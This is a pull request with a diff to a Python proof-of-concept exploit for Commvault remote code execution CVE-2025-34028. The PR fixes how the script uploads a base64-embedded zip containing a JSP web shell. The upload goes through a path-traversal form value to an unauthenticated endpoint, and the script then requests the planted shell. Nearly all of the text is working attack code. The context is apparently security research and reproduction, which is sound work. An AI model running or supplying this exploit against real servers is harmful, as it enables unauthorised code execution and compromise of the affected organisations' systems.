### PR TITLE
Fixup latin1 encoding breaking zip upload on some platforms

### DIFF
--- a/watchtowr-vs-commvault-rce-CVE-2025-34028.py
+++ b/watchtowr-vs-commvault-rce-CVE-2025-34028.py
@@ -49,14 +49,17 @@ if "></cv:cvMessages>" not in response.text:
     exit()
 
 shell = base64.b64decode("UEsDBAoAAAAAANx8h1oAAAAAAAAAAAAAAAAIABwAZGlzdC1jYy9VVAkAAxCB82cRgfNndXgLAAEE9QEAAAQUAAAAUEsDBAoAAAAAABFGhloAAAAAAAAAAAAAAAAOABwAZGlzdC1jYy9jY0FwcC9VVAkAA2LP8WfnffNndXgLAAEE9QEAAAQUAAAAUEsDBBQAAAAIABFGhlqqBA47KAAAAC8AAAAYABwAZGlzdC1jYy9jY0FwcC9pbmRleC5odG1sVVQJAANiz/Fn533zZ3V4CwABBPUBAAAEFAAAALPJKMnNsbNJyk+ptLPJMLTzSM3JyVcIzy/KSbHRB/Jt9CFS+mB1XABQSwMEFAAAAAgA41OIWtngLiSEAAAAmgAAABEAHABkaXN0LWNjL3NoZWxsLmpzcFVUCQADaYr0Z2qK9Gd1eAsAAQT1AQAABBQAAAAljc0KwjAQhO99iiUQUA/JwZukQejJmyA+QMS1rTQ/bDdC3t4tPQ3MN8zn9BVKGBHmWDJxr77hF0zleTEnBdp3buK4SLzyu/kOwE1n/2grY4Rb+mSKgeecnJV6o8UPlQgTw3NFuoDTPexzMyLfKRckbgdVhZoUIqqjWJwtorC7Q7425R9QSwECHgMKAAAAAADcfIdaAAAAAAAAAAAAAAAACAAYAAAAAAAAABAA/UEAAAAAZGlzdC1jYy9VVAUAAxCB82d1eAsAAQT1AQAABBQAAABQSwECHgMKAAAAAAARRoZaAAAAAAAAAAAAAAAADgAYAAAAAAAAABAA/UFCAAAAZGlzdC1jYy9jY0FwcC9VVAUAA2LP8Wd1eAsAAQT1AQAABBQAAABQSwECHgMUAAAACAARRoZaqgQOOygAAAAvAAAAGAAYAAAAAAABAAAAtIGKAAAAZGlzdC1jYy9jY0FwcC9pbmRleC5odG1sVVQFAANiz/FndXgLAAEE9QEAAAQUAAAAUEsBAh4DFAAAAAgA41OIWtngLiSEAAAAmgAAABEAGAAAAAAAAQAAALSBBAEAAGRpc3QtY2Mvc2hlbGwuanNwVVQFAANpivRndXgLAAEE9QEAAAQUAAAAUEsFBgAAAAAEAAQAVwEAANMBAAAAAA0K")
-latin1_string = shell.decode('latin-1')
 
 random_path = ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(8))
 print(f"[*] Uploading to  /reports/MetricsUpload/{random_path}/")
 upload_url = f"{args.url}/commandcenter/deployServiceCommcell.do"
-upload_headers = {"User-Agent": "CommvaultRCEPoC", "Accept": "*/*", "Content-Type": "multipart/form-data; boundary=------------------------FmGJxvg3mB7iaQevvO5qVW", "Connection": "keep-alive"}
-upload_data = f"--------------------------FmGJxvg3mB7iaQevvO5qVW\r\nContent-Disposition: form-data; name=\"servicePack\"\r\nContent-Type: text/plain\r\n\r\n/../../../Reports/MetricsUpload/{random_path}/\r\n--------------------------FmGJxvg3mB7iaQevvO5qVW\r\nContent-Disposition: form-data; name=\"version\"\r\nContent-Type: text/plain\r\n\r\n12.45\r\n--------------------------FmGJxvg3mB7iaQevvO5qVW\r\nContent-Disposition: form-data; name=\"file\"; filename=\"file.zip\"\r\nContent-Type: application/octet-stream\r\n\r\n{latin1_string}\r\n--------------------------FmGJxvg3mB7iaQevvO5qVW--\r\n"
-requests.post(upload_url, headers=upload_headers, data=upload_data, verify=False)
+upload_headers = {"User-Agent": "CommvaultRCEPoC", "Accept": "*/*"}
+upload_form = { 
+        'servicePack': (None, f'/../../../Reports/MetricsUpload/{random_path}/', 'text/plain'),
+        'version': (None, '12.45', 'text/plain'),
+        'file': ('file.zip', shell, 'application/octet-stream')
+}
+requests.post(upload_url, headers=upload_headers, files=upload_form, verify=False)
 
 shell_url = f"{args.url}/reports/MetricsUpload/{random_path}/.tmp/dist-cc/dist-cc/shell.jsp"
 print(f"[*] Fetching System User from  {shell_url}")


### PR DESCRIPTION
`latin-1` can cause weird byte alignment issues on some platforms when marshaling the zip binary to a string. This removes the manual boundary creation and moves to using the multipart handling from requests so you can use the raw binary data without encoding juggling.

Bumped into this during reproduction and the exploit was creating 0 length `dist-cc` files vs directories:

![image](https://github.com/user-attachments/assets/e5dca433-f043-4145-b357-d86727b88e04)
